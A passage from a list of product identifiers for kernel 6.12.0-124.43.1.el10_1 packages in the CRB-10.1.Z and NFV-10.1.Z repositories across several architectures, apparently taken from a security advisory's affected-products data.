"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
